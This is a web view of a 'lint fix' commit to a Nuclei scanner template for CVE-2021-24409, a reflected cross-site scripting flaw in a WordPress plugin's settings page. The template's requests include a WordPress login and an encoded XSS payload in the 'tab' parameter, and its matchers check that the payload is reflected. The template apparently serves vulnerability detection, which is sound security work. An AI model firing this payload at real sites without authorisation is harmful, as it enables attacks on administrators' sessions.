daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

lint fix

patch-1
Ritik Chaddha 2023-08-14 17:24:30 +05:30 committed by GitHub
parent 6e325b7fc7
commit 779dd20417
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
http/cves/2021/CVE-2021-24409.yaml
View File

@ -8,7 +8,7 @@ info:
The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator
reference:
- https://wpscan.com/vulnerability/ae3cd3ed-aecd-4d8c-8a2b-2936aaaef0cf
classification:
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
@ -16,7 +16,7 @@ info:
tags: wpscan,cve2023,wordpress,authenticated,cve,wp-plugin,xss
http:
- raw:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
@ -27,11 +27,11 @@ http:
- |
GET /wp-admin/options-general.php?page=prismatic&tab=%22+style%3Danimation-name%3Arotation+onanimationend%3Dalert(%2FXSS%2F)%2F%2F%22 HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "onanimationend=alert(/XSS/)")'
condition: and
condition: and